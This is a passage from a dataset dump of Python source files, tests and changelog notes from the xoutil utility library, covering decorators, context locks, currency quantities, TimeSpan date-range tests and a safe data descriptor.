hello(msg=\"Hi\"):\n print(msg)\n\n @log()\n def hi(msg=\"Hello\"):\n print(msg)\n\n hi()\n hello()\n pass\n\n def test_returning_argless(self):\n @decorator\n def plus2(func, value=1):\n def inner(*args):\n return func(*args) + value\n\n return inner\n\n @plus2\n def ident2(val):\n return val\n\n @plus2()\n def ident3(val):\n return val\n\n self.assertEqual(ident2(10), 11)\n self.assertEqual(ident3(10), 11)\n\n\nclass RegressionTests(unittest.TestCase):\n def test_with_kwargs(self):\n \"\"\"When passing a function as first positional argument, kwargs should\n be tested empty.\n\n \"\"\"\n from xoutil.future.functools import partial\n\n @decorator\n def ditmoi(target, *args, **kwargs):\n return partial(target, *args, **kwargs)\n\n def badguy(n):\n return n\n\n @ditmoi(badguy, b=1)\n def foobar(n, *args, **kw):\n return n\n\n self.assertEqual(badguy, foobar(1))\n\n\nclass Memoizations(unittest.TestCase):\n def test_memoized_property(self):\n from xoutil.future.inspect import getattr_static\n from xoutil.objects import memoized_property\n\n class Foobar:\n @memoized_property\n def prop(self):\n return self\n\n with self.assertRaises(AttributeError):\n\n @prop.setter\n def prop(self, value):\n pass\n\n with self.assertRaises(AttributeError):\n\n @prop.deleter\n def prop(self, value):\n pass\n\n foo = Foobar()\n self.assertNotEquals(getattr_static(foo, \"prop\"), foo)\n self.assertIs(foo.prop, foo)\n self.assertIs(getattr_static(foo, \"prop\"), foo)\n # After the first invocation, the static attr is the result.\n Foobar.prop.reset(foo)\n self.assertNotEquals(getattr_static(foo, \"prop\"), foo)\n\n\nclass ConstantBags(unittest.TestCase):\n def test_constant_bags_decorator(self):\n from xoutil.decorator import constant_bagger as typify\n\n def func(**kwds):\n return kwds\n\n bag = func(ONE=1, TWO=2)\n\n @typify(ONE=1, TWO=2)\n def BAG(**kwds):\n return kwds\n\n self.assertIs(type(BAG), type)\n self.assertIn(\"ONE\", bag)\n self.assertEqual(bag[\"ONE\"], BAG.ONE)\n self.assertEqual(BAG.TWO, 2 * BAG.ONE)\n with self.assertRaises(AttributeError):\n self.assertEqual(bag.TWO, 2 * bag.ONE)\n with self.assertRaises(TypeError):\n self.assertEqual(BAG[\"TWO\"], 2 * BAG[\"ONE\"])\n with self.assertRaises(AttributeError):\n self.assertEqual(BAG.THREE, 3)\n self.assertIs(BAG(THREE=3), BAG)\n self.assertEqual(BAG.THREE, 3)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n" }, { "alpha_fraction": 0.6420729160308838, "alphanum_fraction": 0.6425120830535889, "avg_line_length": 26.10714340209961, "blob_id": "0b7c304463b87d335d404ca63bde5aef15ab9b06", "content_id": "34a14d4e44146334dea60a1e756c86886816516a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2278, "license_type": "no_license", "max_line_length": 78, "num_lines": 84, "path": "/xotl/tools/tasking/lock.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Synchronization lock tools.\n\nA lock object is a synchronization primitive. Locks are used as Python\nContext Managers with only one method (`enter`) and one property (`locked`).\n\nThe method `enter` is used with the Python ``with`` statement and the property\n`locked` is logically True or False depending if the lock is active or not.\n\nFor example::\n\n >>> from xotl.tools.lock import context_lock as ctx\n\n >>> def get_lock_value():\n ... return 'Yes' if ctx.locked else 'No'\n\n >>> with ctx.enter():\n ... one = get_lock_value()\n >>> two = get_lock_value()\n >>> (one, two)\n ('Yes', 'No')\n\n\nLocks are implemented using module-property; this means that each time you\nimport it, a different lock is returned::\n\n >>> from xotl.tools.tasking.lock import context_lock as one\n >>> from xotl.tools.tasking.lock import context_lock as two\n >>> one is two\n False\n\nThe function `context_lock`:func: implement a module property to create a\nclass that use an execution context, see `xotl.tools.context`:mod: module for\nmore information.\n\nIf other lock mechanisms are going to be implementing, for example using\nthreading, this is the place.\n\n\"\"\"\n\nfrom xotl.tools.modules import moduleproperty\n\n\n@moduleproperty\ndef context_lock(self):\n \"\"\"Allocate a lock based on xoutil execution contexts.\"\"\"\n from xotl.tools.objects import classproperty\n\n class ContextLock:\n \"\"\"A class representing the lock.\n\n See `xotl.tools.lock`:mod: module for more information.\n\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n msg = '\"{}\" could not be instanced.'.format(cls.__name__)\n raise RuntimeError(msg)\n\n @classmethod\n def enter(cls, **kwargs):\n \"\"\"Enter the context.\"\"\"\n from xotl.tools.context import context\n\n return context(cls, **kwargs)\n\n @classproperty\n def locked(cls):\n from xotl.tools.context import context\n\n return context[cls]\n\n return ContextLock\n\n\ndel moduleproperty\n" }, { "alpha_fraction": 0.5943081974983215, "alphanum_fraction": 0.6085376739501953, "avg_line_length": 23.83458709716797, "blob_id": "59a5fc42488a4435a1d62600d971bc0a6d21bd23", "content_id": "c3bf1aac33c0899199225d54797d7c5ae5dca30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3304, "license_type": "no_license", "max_line_length": 79, "num_lines": 133, "path": "/xotl/tools/dim/currencies.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Concrete numbers for money.\n\nYou may have 10 dollars and 5 euros in your wallet, that does not mean that\nyou have 15 of anything (but bills, perhaps). Though you may *evaluate* your\ncash in any other currency you don't have that value until you perform an\nexchange with a given rate.\n\nThis module support the family of currencies. Usage::\n\n >>> from xotl.tools.dim.currencies import Rate, Valuation, currency\n >>> dollar = USD = currency('USD')\n >>> euro = EUR = currency('EUR')\n >>> rate = 1.19196 * USD/EUR\n\n >>> isinstance(dollar, Valuation)\n True\n\n >>> isinstance(rate, Rate)\n True\n\n # Even 0 dollars are a valuation\n >>> isinstance(dollar - dollar, Valuation)\n True\n\n # But 1 is not a value nor a rate\n >>> isinstance(dollar/dollar, Valuation) or isinstance(dollar/dollar, Rate)\n False\n\n\nCurrency names are case-insensitive. We don't check the currency name is\nlisted in `ISO 4217`_. So currency ``MVA`` is totally acceptable in this\nmodule.\n\nWe don't download rates from any source.\n\nThis module allows you to trust your computations of money by allowing only\nsensible operations::\n\n >>> dollar + euro # doctest: +ELLIPSIS\n Traceback (...)\n ...\n OperandTypeError: unsupported operand type(s) for +: '{USD}/{}' and '{EUR}/{}\n\n\nIf you convert your euros to dollars::\n\n >>> dollar + rate * euro\n 2.19196::{USD}/{}\n\n # Or your dollars to euros\n >>> dollar/rate + euro\n 1.83895432733::{EUR}/{}\n\n\n.. _ISO 4217: https://en.wikipedia.org/wiki/ISO_4217\n\n\"\"\"\n\n\nclass ValueType(type):\n def __instancecheck__(self, which):\n from .meta import Quantity\n\n if isinstance(which, Quantity):\n return any(\n which.signature is currency.signature\n for currency in _Currency.units.values()\n )\n else:\n return False\n\n\nclass Valuation(metaclass=ValueType):\n pass\n\n\nclass RateType(type):\n def __instancecheck__(self, which):\n from .meta import Quantity\n\n if isinstance(which, Quantity):\n top, bottom = which.signature.top, which.signature.bottom\n if len(top) == len(bottom) == 1:\n iscurrency = lambda s: isinstance(s[0], _Currency)\n return iscurrency(top) and iscurrency(bottom)\n else:\n return False\n else:\n return False\n\n\nclass Rate(metaclass=RateType):\n pass\n\n\nclass _Currency:\n instances = {}\n units = {}\n\n def __new__(cls, name):\n from .meta import Quantity, Signature\n\n name = name.upper()\n res = cls.instances.get(name, None)\n if res is None:\n res = super().__new__(cls)\n res.name = name\n cls.instances[name] = res\n cls.units[name] = Quantity(1, Signature(top=(res,)))\n return res\n\n def __str__(self):\n return self.name\n\n @property\n def unit(self):\n return self.units[self.name]\n\n\ndef currency(name):\n \"\"\"Get the canonical value for the given currency `name`.\n\n \"\"\"\n return _Currency(name).unit\n" }, { "alpha_fraction": 0.7253731489181519, "alphanum_fraction": 0.737313449382782, "avg_line_length": 46.85714340209961, "blob_id": "8b73f319adaf6971263621f5f570cb64207bf0f7", "content_id": "aab7abe9119be6c59268db18d30a0e2a7c3794e3", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1005, "license_type": "permissive", "max_line_length": 78, "num_lines": 21, "path": "/docs/source/history/_changes-1.5.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix a bug in `xoutil.objects.extract_attrs`:func:. It was not raising\n exceptions when some attribute was not found and `default` was not provided.\n\n Also now the function supports paths like\n `xoutil.objects.get_traverser`:func:.\n\n- `xoutil` contains now a copy of the excellent project `six`_ exported as\n ``xoutil.six`` (not documented here). Thus the compatibility module\n ``xoutil.compat`` is now deprecated and will removed in the future.\n\n There are some things that ``xoutil.compat`` has that ``xoutil.six`` does\n not. For instance, ``six`` does not include fine grained python version\n markers. So if your code depends not on Python 3 v Python 2 dichotomy but\n on features introduced in Python 3.2 you must use the ``sys.version_info``\n directly.\n\n Notwithstanding that, ``xoutil`` will slowly backport several Python 3.3\n standard library features to Python 2.7 so that they are consistently used\n in any Python up to 2.7 (but 3.0).\n\n.. _six: https://pypi.python.org/pypi/six\n" }, { "alpha_fraction": 0.6295551061630249, "alphanum_fraction": 0.6574581861495972, "avg_line_length": 28.644033432006836, "blob_id": "ef1c3885a1efdcf81cd71ec43a7b9d7033cb1fbc", "content_id": "a74579e3860833a5835c3298cbbead009f5b21ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14408, "license_type": "no_license", "max_line_length": 88, "num_lines": 486, "path": "/tests/test_datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\n\nfrom xoutil.future.datetime import date, datetime, timedelta\nfrom xoutil.future.datetime import daterange\nfrom xoutil.future.datetime import TimeSpan, EmptyTimeSpan, DateTimeSpan\nfrom xoutil.testing.datetime import timespans, datetimespans\n\nimport hypothesis\nfrom hypothesis import strategies, given, settings\n\n\ndates = strategies.dates\nmaybe_date = dates() | strategies.none()\nmaybe_datetimes = strategies.datetimes() | strategies.none()\n\n\ndef test_datetime_imports():\n from xoutil.future import datetime\n from xotl.tools.future import datetime as dt\n\n assert datetime is dt\n\n from xoutil.future.datetime import TimeSpan\n from xotl.tools.future.datetime import TimeSpan as TS\n\n assert TS is TimeSpan\n\n\ndef test_daterange_stop_only():\n result = list(daterange(date(1978, 10, 21)))\n assert result[0] == date(1978, 10, 1)\n assert result[-1] == date(1978, 10, 20)\n\n\ndef test_daterange_empty():\n assert [] == list(daterange(date(1978, 10, 21), -2))\n assert [] == list(daterange(date(1978, 10, 21), date(1978, 10, 10)))\n assert [] == list(daterange(date(1978, 10, 10), date(1978, 10, 20), -1))\n\n\ndef test_daterange_going_back_in_time():\n result = list(daterange(date(1978, 10, 21), -2, -1))\n assert result[0] == date(1978, 10, 21)\n assert result[-1] == date(1978, 10, 20)\n\n\ndef test_daterange_invalid_int_stop():\n with pytest.raises(TypeError):\n daterange(10)\n\n\ndef test_daterange_invalid_step():\n with pytest.raises(ValueError):\n daterange(None, date(1978, 10, 21), 0)\n\n\n@given(timespans(), timespans())\[email protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_intersection_commutable(ts1, ts2):\n # Commutable\n assert ts2 * ts1 == (ts1 & ts2)\n\n\n@given(timespans(), timespans())\[email protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_intersection_containment(ts1, ts2):\n overlap = ts1 * ts2\n if overlap is not None:\n # The intersection must always be totally covered by both ts1 and ts2,\n # unless ts1 and ts2 don't intersect\n assert (overlap & ts1) == overlap\n assert (overlap <= ts1) is True\n assert (overlap <= ts2) is True\n\n\n@given(timespans(), timespans())\[email protected](ts1=TimeSpan(), ts2=timespans().example())\ndef test_comparision(ts1, ts2):\n if ts1 <= ts2 <= ts1:\n assert ts1 == ts2\n if ts1 == ts2:\n assert ts1 <= ts2 <= ts1\n\n # Single day intersection and equality test\n if ts1.start_date:\n assert ts1 * ts1.start_date == ts1.start_date\n assert ts1.start_date * ts1 == ts1.start_date\n assert ts1.start_date in ts1\n\n\n@given(timespans(), datetimespans())\ndef test_interaction_timespan_with_datetimespans(ts, dts):\n assert isinstance(dts & ts, (DateTimeSpan, type(EmptyTimeSpan)))\n assert isinstance(ts & dts, (DateTimeSpan, type(EmptyTimeSpan)))\n\n assert DateTimeSpan.from_timespan(ts) == ts\n assert ts == DateTimeSpan.from_timespan(ts)\n\n ts = TimeSpan(\"2018-01-01\", \"2018-01-01\")\n dts = DateTimeSpan(\"2018-01-01 00:00:01\", \"2018-01-01 00:00:02\")\n\n assert ts != dts\n assert dts != ts\n\n\n@given(timespans(), timespans(), dates())\ndef test_general_cmp_properties(ts1, ts2, date):\n assert bool(ts1 <= ts2) == bool(ts2 >= ts1)\n # In Python 2, dates have a __le__ that does no compare to timespans.\n assert bool(TimeSpan.from_date(date) <= ts2) == bool(ts2 >= date)\n\n overlap = ts1 & ts2\n if not overlap:\n # Disjoint sets are not orderable...\n assert not (ts1 <= ts2) and not (ts2 <= ts1)\n\n\n@given(timespans(unbounds=\"future\"))\ndef test_outside_date(ts):\n from datetime import timedelta\n\n assert ts.start_date\n outsider = ts.start_date - timedelta(1)\n assert outsider not in ts\n\n\n@given(\n datetimespans(\n dates=strategies.datetimes(min_value=datetime(1, 1, 2)), unbounds=\"future\"\n )\n)\ndef test_outside_datetime(dts):\n from datetime import timedelta\n\n assert dts.start_date\n outsider = dts.start_date - timedelta(1)\n assert outsider not in dts\n\n\n@given(timespans() | datetimespans())\ndef test_empty_timespan(ts):\n assert ts >= EmptyTimeSpan <= ts, \"Empty is a subset of any TS\"\n\n assert (\n EmptyTimeSpan <= EmptyTimeSpan >= EmptyTimeSpan\n ), \"Empty is a subset of itself\"\n\n assert not EmptyTimeSpan, \"Empty is considered False\"\n\n assert not (ts <= EmptyTimeSpan), \"Empty is not a superset of any TS\"\n\n type(EmptyTimeSpan)() is EmptyTimeSpan\n\n assert EmptyTimeSpan & ts == EmptyTimeSpan * ts == EmptyTimeSpan\n assert EmptyTimeSpan | ts == EmptyTimeSpan + ts == ts\n\n\n@given(timespans(unbounds=\"none\"), timespans())\ndef test_failure_of_triple_intersection(ts1, ts2):\n from datetime import timedelta\n\n ts0 = TimeSpan.from_date(ts1.start_date - timedelta(1))\n assert not (ts0 & ts1 & ts2)\n\n\n@given(strategies.dates())\ndef test_xoutil_dates_are_representable(value):\n from xoutil.future.datetime import date\n\n class mydate(date):\n pass\n\n value = mydate(value.year, value.month, value.day)\n assert value.strftime(\"%Y-%m-%d\")\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_timespans_are_representable(value):\n assert repr(value)\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_generate_valid_timespans(ts):\n assert ts.valid\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_ts_returns_dates_not_subtypes(ts):\n from datetime import date\n\n assert type(ts.start_date) is date\n assert type(ts.end_date) is date\n\n\n@given(timespans(unbounds=\"none\"), strategies.dates())\ndef test_operate_with_timespans(ts, d):\n assert ts.start_date - d is not None\n assert d - ts.start_date is not None\n\n\n@given(timespans(unbounds=\"none\"), timespans(unbounds=\"none\"))\ndef test_definition_of_overlaps(ts1, ts2):\n assert ts1.overlaps(ts2) == bool(ts1 & ts2)\n\n\n@given(timespans(unbounds=\"none\"))\ndef test_duplication_of_timespans(ts1):\n ts2 = TimeSpan(ts1.start_date, ts1.end_date)\n assert {ts1, ts2} == {ts1}, \"ts1 and ts2 are equal but different!\"\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_reversed(ts1, delta):\n try:\n assert (ts1 << delta) == (ts1 >> -delta)\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_keeps_unbounds(ts1, delta):\n try:\n assert ts1.unbound == (ts1 << delta).unbound\n assert ts1.future_unbound == (ts1 << delta).future_unbound\n assert ts1.past_unbound == (ts1 << delta).past_unbound\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_doubled(ts1, delta):\n try:\n assert ((ts1 << delta) << delta) == (ts1 << (2 * delta))\n except OverflowError:\n pass\n\n\n@given(timespans(), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_backandforth(ts1, delta):\n try:\n assert ts1 == ((ts1 << delta) >> delta) == (ts1 << 0) == (ts1 >> 0)\n except OverflowError:\n pass\n\n\n@given(timespans(unbounds=\"none\"), strategies.integers(min_value=-1000, max_value=1000))\ndef test_timespans_displacement_dates(ts1, delta):\n try:\n res = ts1 << delta\n except OverflowError:\n # Ignore if the date it's being displaced to non-supported date,\n # that's for the client to deal with\n pass\n else:\n assert (res.start_date - ts1.start_date).days == -delta\n assert (res.end_date - ts1.end_date).days == -delta\n try:\n res = ts1 >> delta\n except OverflowError:\n # Ignore if the date it's being displaced to non-supported date,\n # that's for the client to deal with\n pass\n else:\n assert (res.start_date - ts1.start_date).days == delta\n assert (res.end_date - ts1.end_date).days == delta\n\n\n@given(\n timespans(unbounds=\"none\") | datetimespans(unbounds=\"none\"),\n strategies.integers(min_value=-1000, max_value=1000),\n)\ndef test_timespans_displacement_keeps_the_len(ts1, delta):\n try:\n res = ts1 << delta\n except OverflowError:\n pass\n else:\n assert len(ts1) == len(res)\n\n\n@given(timespans() | datetimespans())\ndef test_timespans_are_pickable(ts):\n import pickle\n\n for proto in range(1, pickle.HIGHEST_PROTOCOL + 1):\n assert ts == pickle.loads(pickle.dumps(ts, proto))\n\n\ndef test_empty_timespan_is_pickable():\n import pickle\n\n for proto in range(1, pickle.HIGHEST_PROTOCOL + 1):\n assert EmptyTimeSpan is pickle.loads(pickle.dumps(EmptyTimeSpan, proto))\n\n\n@given(strategies.datetimes(), strategies.datetimes())\ndef test_timespan_with_datetimes(d1, d2):\n from datetime import datetime as dt, date as d\n\n ts = TimeSpan(d1, d2)\n assert not isinstance(ts.start_date, dt)\n assert isinstance(ts.start_date, d)\n assert not isinstance(ts.end_date, dt)\n assert isinstance(ts.end_date, d)\n\n\n@given(datetimespans())\ndef test_datetimespans_ts_fields(dts):\n if dts.start_datetime is None:\n assert dts.start_date is None\n else:\n assert dts.start_date == dts.start_datetime.date()\n if dts.end_datetime is None:\n assert dts.end_date is None\n else:\n assert dts.end_date == dts.end_datetime.date()\n\n\n@given(maybe_date, datetimespans())\ndef test_setting_start_date(d, dts):\n dts.start_date = d\n if d is not None:\n assert dts.start_datetime.date() == d\n assert dts.start_datetime == datetime(d.year, d.month, d.day)\n else:\n assert dts.start_datetime is None\n\n\n@given(maybe_date, datetimespans())\ndef test_setting_end_date(d, dts):\n dts.end_date = d\n if d is not None:\n assert dts.end_datetime.date() == d\n assert dts.end_datetime == datetime(d.year, d.month, d.day, 23, 59, 59)\n else:\n assert dts.end_datetime is None\n\n\n@given(\n strategies.datetimes(\n min_value=datetime(1970, 1, 1), max_value=datetime(5000, 12, 31)\n ),\n strategies.integers(min_value=1, max_value=200),\n)\ndef test_timespan_diff(start_date, delta):\n days = timedelta(days=delta)\n big = TimeSpan(start_date, start_date + 3 * days)\n x, y = big.diff(big)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n x, y = big.diff(EmptyTimeSpan)\n assert x == big and y is EmptyTimeSpan\n\n outsider = big >> 4 * days\n assert not big & outsider\n x, y = big.diff(outsider)\n assert x == big and y is EmptyTimeSpan\n x, y = outsider.diff(big)\n assert x == outsider and y is EmptyTimeSpan\n\n atstart = TimeSpan(start_date, start_date + days)\n assert atstart < big\n x, y = big.diff(atstart)\n assert x is EmptyTimeSpan\n assert y\n assert add_timespans(atstart, y) == big\n\n beforestart = TimeSpan(start_date - days, start_date + days)\n x, y = big.diff(beforestart)\n assert x is EmptyTimeSpan\n assert y\n assert add_timespans(beforestart & big, y) == big\n\n atend = TimeSpan(start_date + 2 * days, start_date + 3 * days)\n assert atend < big\n x, y = big.diff(atend)\n assert y is EmptyTimeSpan\n assert x\n assert add_timespans(x, atend) == big\n\n afterend = TimeSpan(start_date + 2 * days, start_date + 4 * days)\n x, y = big.diff(afterend)\n assert y is EmptyTimeSpan\n assert x\n assert add_timespans(x, big & afterend) == big\n\n middle = TimeSpan(start_date + days, start_date + 2 * days)\n assert middle < big\n x, y = big.diff(middle)\n assert x and y\n assert add_timespans(add_timespans(x, middle), y) == big\n\n bigger = TimeSpan(start_date - days, start_date + 4 * days)\n x, y = big.diff(bigger)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n\n@given(\n strategies.datetimes(\n min_value=datetime(1970, 1, 1), max_value=datetime(5000, 12, 31)\n ),\n strategies.integers(min_value=1, max_value=10000),\n)\n@settings(deadline=None)\ndef test_datetimespan_diff(start_date, delta):\n secs = timedelta(seconds=delta)\n big = DateTimeSpan(start_date, start_date + 3 * secs)\n assert big.start_datetime == start_date\n assert big.end_datetime == start_date + 3 * secs\n x, y = big.diff(big)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n x, y = big.diff(EmptyTimeSpan)\n assert x == big and y is EmptyTimeSpan\n\n outsider = big >> 4 * secs\n assert not big & outsider\n x, y = big.diff(outsider)\n assert x == big and y is EmptyTimeSpan\n x, y = outsider.diff(big)\n assert x == outsider and y is EmptyTimeSpan\n\n atstart = DateTimeSpan(start_date, start_date + secs)\n assert atstart < big\n x, y = big.diff(atstart)\n assert x is EmptyTimeSpan\n assert y\n assert add_dtspans(atstart, y) == big\n\n beforestart = DateTimeSpan(start_date - secs, start_date + secs)\n x, y = big.diff(beforestart)\n assert x is EmptyTimeSpan\n assert y\n assert add_dtspans(beforestart & big, y) == big\n\n atend = DateTimeSpan(start_date + 2 * secs, start_date + 3 * secs)\n assert atend < big\n x, y = big.diff(atend)\n assert y is EmptyTimeSpan\n assert x\n assert add_dtspans(x, atend) == big\n\n afterend = DateTimeSpan(start_date + 2 * secs, start_date + 4 * secs)\n x, y = big.diff(afterend)\n assert y is EmptyTimeSpan\n assert x\n assert add_dtspans(x, big & afterend) == big\n\n middle = DateTimeSpan(start_date + secs, start_date + 2 * secs)\n assert middle < big\n x, y = big.diff(middle)\n assert x and y\n assert add_dtspans(add_dtspans(x, middle), y) == big\n\n bigger = DateTimeSpan(start_date - secs, start_date + 4 * secs)\n x, y = big.diff(bigger)\n assert x is EmptyTimeSpan and y is EmptyTimeSpan\n\n\n@given(datetimespans())\ndef test_datetimespan_repr(ts):\n assert eval(repr(ts)) == ts\n assert DateTimeSpan(\"2018-01-01\") == DateTimeSpan(datetime(2018, 1, 1))\n\n\ndef add_timespans(x, y):\n if x.end_date == y.start_date - timedelta(1):\n return TimeSpan(x.start_date, y.end_date)\n else:\n raise ValueError\n\n\ndef add_dtspans(x, y):\n if x.end_datetime == y.start_datetime - timedelta(seconds=1):\n return DateTimeSpan(x.start_datetime, y.end_datetime)\n else:\n raise ValueError\n" }, { "alpha_fraction": 0.7257384061813354, "alphanum_fraction": 0.7257384061813354, "avg_line_length": 32.85714340209961, "blob_id": "a11f071b0a7db48df4ed43ca95eeb522ec3b5c3b", "content_id": "3ecfb64f0ab3cc99d1bb4613503249eb5d8652c9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 237, "license_type": "permissive", "max_line_length": 78, "num_lines": 7, "path": "/docs/source/history/_changes-1.8.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate module ``xoutil.logger``.\n\n- Remove deprecated function ``xoutil.iterators.fake_dict_iteritems``.\n\n- Add `xoutil.objects.temp_attributes`:func:.\n\n- Add functions `~xoutil.fp.tools.fst`:func: and `~xoutil.fp.tools.snd`:func:.\n" }, { "alpha_fraction": 0.5805119872093201, "alphanum_fraction": 0.5839699506759644, "avg_line_length": 30.612380981445312, "blob_id": "9c63ed9b5a239ecb2d16ee9b17d08d910640252b", "content_id": "322e57a9d36fc3122206b637a1d0fb5b95151daa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56682, "license_type": "no_license", "max_line_length": 88, "num_lines": 1793, "path": "/xotl/tools/objects.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Several utilities for objects in general.\"\"\"\n\nfrom contextlib import contextmanager\n\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.deprecation import deprecated\n\n\n__docstring_format__ = \"rst\"\n\n\n_INVALID_CLASS_TYPE_MSG = \"``cls`` must be a class not an instance\"\n\n\ndef _len(x):\n \"Safe length\"\n return len(x) if x else 0\n\n\n# TODO: Deprecate these two functions, can be used to always return True or\n# False\ndef _true(*args, **kwargs):\n return True\n\n\ndef _false(*args, **kwargs):\n return False\n\n\nclass SafeDataItem:\n \"\"\"A data descriptor that is safe.\n\n A *safe descriptor* never uses internal special methods ``__getattr__``\n and ``__getattribute__`` to obtain its value. Also allow to define a\n constructor or a default value for the first time the attribute is read\n without a prior value assigned.\n\n Need to be used only in scenarios where descriptor instance values must be\n accessed safely in '__getattr__' implementations.\n\n This class only can be instanced inner a class context in one of the\n following scenarios::\n\n 1. As a normal descriptor not associated with a constructor method::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class Foobar:\n ... safe('mapping', dict)\n >>> f = Foobar()\n >>> f.mapping\n {}\n\n 2. As a normal descriptor but associated with a constructor method::\n\n >>> class Foobar:\n ... @safe.property\n ... def mapping(self):\n ... return {'this': self}\n >>> f = Foobar()\n >>> f.mapping['this'] is f\n True\n\n 3. As a slot. In this case generate an internal slot and a safe\n descriptor to access it::\n\n >>> class Foobar:\n ... __slots__ = safe.slot('mapping', dict)\n >>> f = Foobar()\n >>> f.mapping\n {}\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Creates a new safe descriptor.\n\n Arguments are parsed to discover:\n\n - An attribute name if a string with a valid identifier is given as a\n positional argument.\n\n - A constructor for initial or default value when the descriptor is\n read without being assigned. Positional argument with a callable.\n\n - Default literal value is given using a keyword argument with any of\n the following names: `default`, `value` or `initial_value`. If this\n argument is given the constructor callable is invalid.\n\n - A checker for value validity with the keyword argument with any of\n the following names: `validator`, `checker` or `check`. The checker\n could be a type, a tuple of types, a function receiving the value\n and return True or False, or a list containing arguments to use\n `xotl.tools.validators.check`:func:.\n\n - Boolean `False` to avoid assigning the descriptor in the class\n context with the keyword argument `do_assigning`. Any other value\n but `False` is invalid because this concept is implicitly required\n and use a `False` value is allowed but discouraged.\n\n See :meth:`__parse_arguments` for more information.\n\n \"\"\"\n self.__parse_arguments(*args, **kwargs)\n if self.do_assigning:\n cls_locals = self._get_class_context()\n current = cls_locals.get(self.attr_name)\n if not isinstance(current, SafeDataItem):\n cls_locals[self.attr_name] = self\n else:\n msg = (\n \"class `%s` has already an assigned descriptor with \"\n \"the same name `%s`\"\n )\n type_name = type(self).__name__\n raise AttributeError(msg % (type_name, self.attr_name))\n\n @staticmethod\n def slot(slot_name, *args, **kwargs):\n \"\"\"Generate an internal slot and this descriptor to access it.\n\n This must appears in a slots declaration::\n\n class Foobar:\n __slots__ = (SafeDataItem.slot('mapping', dict), ...)\n\n This method return the inner slot name, argument passed is used for\n the safe descriptor. In the example above the slot descriptor will be\n `__mapping__` and `mapping` the safe descriptor.\n\n \"\"\"\n self = SafeDataItem(slot_name, *args, **kwargs)\n return self.inner_name\n\n @staticmethod\n def property(*args, **kwargs):\n \"\"\"Descriptor to access a property value based in a method.\n\n There are two ways of use this method:\n\n - With only one positional and no keyword arguments. The positional\n argument must be a method which is assumed as the constructor of the\n original property value. Method name is used as the attribute name.\n In this case it returns a safe descriptor::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class Foobar:\n ... @safe.property\n ... def mapping(self):\n ... 'To generate a safe `mapping` descriptor.'\n ... return {'this': self}\n >>> f = Foobar()\n >>> f.mapping['this'] is f\n True\n\n - With no positional and with keyword arguments. In this case it\n returns a decorator that receive one single argument (the method)\n and return the safe descriptor::\n\n >>> class Foobar:\n ... @safe.property(kind='class')\n ... def mapping(cls):\n ... 'To generate a safe `mapping` descriptor.'\n ... return {'this': cls}\n >>> f = Foobar()\n >>> f.mapping['this'] is Foobar\n True\n\n\n Returns the safe descriptor instance if only the method is given, or a\n closure if additional keyword arguments are given.\n\n Additional keyword argument `kind` could be 'normal' (for normal\n methods), 'static' (for static methods), and 'class' (for class\n methods)::\n\n \"\"\"\n\n def inner(method):\n from types import FunctionType as function\n from xotl.tools.validators import check\n\n FUNC_KINDS = (\"normal\", \"static\", \"class\")\n FUNC_TYPES = (function, staticmethod, classmethod)\n IN_FUNC_TYPES = FUNC_KINDS.__contains__\n KIND_NAME = \"kind\"\n kind = kwargs.pop(KIND_NAME, FUNC_KINDS[0])\n if check(kind, IN_FUNC_TYPES) and 